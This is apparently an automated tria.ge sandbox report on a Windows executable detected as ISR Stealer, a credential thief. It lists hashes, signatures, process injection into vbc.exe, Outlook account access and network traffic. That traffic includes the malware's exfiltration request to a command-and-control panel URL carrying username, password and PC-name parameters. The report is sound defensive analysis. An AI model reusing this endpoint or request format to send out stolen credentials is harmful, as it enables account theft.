Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    93s
  • max time network
    98s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    28/11/2022, 17:57 UTC

General

  • Target

    33f3c90640f81afc2210d3936ed94545817a1c5d87fb55e03d485bb760882803.exe

  • Size

    1010KB

  • MD5

    5a0ea1ccb0cddd973b3a35e70f7a5b17

  • SHA1

    6cbfef80043a991b73f62747450085ec30cd267f

  • SHA256

    33f3c90640f81afc2210d3936ed94545817a1c5d87fb55e03d485bb760882803

  • SHA512

    f2c4c1904685ef7b10d0996ff3a3b1efacfe16fe7ac2e0a960fbb69041b57358ec19c9d01fcd6f6537b06e77a218e948bb023598f91939bb8ffbce6520a29e65

  • SSDEEP

    24576:Y9ctReZNtnbkiWk9d8PSqiHa1YfMQvV7PnZY2n+c:1EZTYHkPkSfH4yMSRY2

Malware Config

Signatures

  • ISR Stealer

    ISR Stealer is a modified version of Hackhound Stealer written in visual basic.

  • ISR Stealer payload 6 IoCs
  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients

  • Nirsoft 2 IoCs
  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Uses the VBS compiler for execution 1 TTPs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\33f3c90640f81afc2210d3936ed94545817a1c5d87fb55e03d485bb760882803.exe
    "C:\Users\Admin\AppData\Local\Temp\33f3c90640f81afc2210d3936ed94545817a1c5d87fb55e03d485bb760882803.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:896
    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2032
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        /scomma "C:\Users\Admin\AppData\Local\Temp\xSMsKsmugl.ini"
        3⤵
          PID:1372
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          /scomma "C:\Users\Admin\AppData\Local\Temp\BTqvF4xAAg.ini"
          3⤵
          • Accesses Microsoft Outlook accounts
          PID:952

    Network

    • flag-unknown
      DNS
      www.legend2015.netai.net
      vbc.exe
      Remote address:
      8.8.8.8:53
      Request
      www.legend2015.netai.net
      IN A
      Response
      www.legend2015.netai.net
      IN A
      153.92.0.100
    • flag-unknown
      GET
      http://www.legend2015.netai.net/legend2015/PHP/index.php?action=add&username=&password=&app=&pcname=ZERMMMDR&sitename=
      vbc.exe
      Remote address:
      153.92.0.100:80
      Request
      GET /legend2015/PHP/index.php?action=add&username=&password=&app=&pcname=ZERMMMDR&sitename= HTTP/1.1
      User-Agent: HardCore Software For : Public
      Host: www.legend2015.netai.net
      Response
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Wed, 30 Nov 2022 00:58:28 GMT
      Content-Type: text/html
      Content-Length: 162
      Connection: keep-alive
      Location: https://www.000webhost.com/migrate?static=true
      X-Frame-Options: sameorigin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
    • flag-unknown
      DNS
      www.000webhost.com
      vbc.exe
      Remote address:
      8.8.8.8:53
      Request
      www.000webhost.com
      IN A
      Response
      www.000webhost.com
      IN A
      104.19.184.120
      www.000webhost.com
      IN A
      104.19.185.120
    • flag-unknown
      GET
      https://www.000webhost.com/migrate?static=true
      vbc.exe
      Remote address:
      104.19.184.120:443
      Request
      GET /migrate?static=true HTTP/1.1
      User-Agent: HardCore Software For : Public
      Host: www.000webhost.com
      Connection: Keep-Alive
    • 153.92.0.100:80
      http://www.legend2015.netai.net/legend2015/PHP/index.php?action=add&username=&password=&app=&pcname=ZERMMMDR&sitename=
      http
      vbc.exe
      456 B
      643 B
      6
      4

      HTTP Request

      GET http://www.legend2015.netai.net/legend2015/PHP/index.php?action=add&username=&password=&app=&pcname=ZERMMMDR&sitename=

      HTTP Response

      301
    • 104.19.184.120:443
      https://www.000webhost.com/migrate?static=true
      tls, http
      vbc.exe
      954 B
      5.7kB
      10
      12

      HTTP Request

      GET https://www.000webhost.com/migrate?static=true
    • 8.8.8.8:53
      www.legend2015.netai.net
      dns
      vbc.exe
      70 B
      86 B
      1
      1

      DNS Request

      www.legend2015.netai.net

      DNS Response

      153.92.0.100

    • 8.8.8.8:53
      www.000webhost.com
      dns
      vbc.exe
      64 B
      96 B
      1
      1

      DNS Request

      www.000webhost.com

      DNS Response

      104.19.184.120
      104.19.185.120

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\xSMsKsmugl.ini

      Filesize

      5B

      MD5

      d1ea279fb5559c020a1b4137dc4de237

      SHA1

      db6f8988af46b56216a6f0daf95ab8c9bdb57400

      SHA256

      fcdcc2c46896915a1c695d6231f0fee336a668531b7a3da46178c80362546dba

      SHA512

      720e9c284f0559015312df7fe977563e5e16f48d3506e51eb4016adf7971924d352f740b030aa3adc81b6f65fd1dba12df06d10fa6c115074e5097e7ee0f08b3

    • memory/896-54-0x0000000075E31000-0x0000000075E33000-memory.dmp

      Filesize

      8KB

    • memory/896-55-0x0000000074C30000-0x00000000751DB000-memory.dmp

      Filesize

      5.7MB

    • memory/896-56-0x0000000074C30000-0x00000000751DB000-memory.dmp

      Filesize

      5.7MB

    • memory/896-66-0x0000000074C30000-0x00000000751DB000-memory.dmp

      Filesize

      5.7MB

    • memory/952-86-0x0000000000400000-0x000000000041F000-memory.dmp

      Filesize

      124KB

    • memory/952-85-0x0000000000400000-0x000000000041F000-memory.dmp

      Filesize

      124KB

    • memory/952-84-0x0000000000400000-0x000000000041F000-memory.dmp

      Filesize

      124KB

    • memory/952-80-0x0000000000400000-0x000000000041F000-memory.dmp

      Filesize

      124KB

    • memory/1372-73-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1372-68-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1372-72-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1372-75-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1372-76-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/2032-79-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2032-74-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2032-62-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2032-60-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2032-58-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2032-57-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2032-87-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.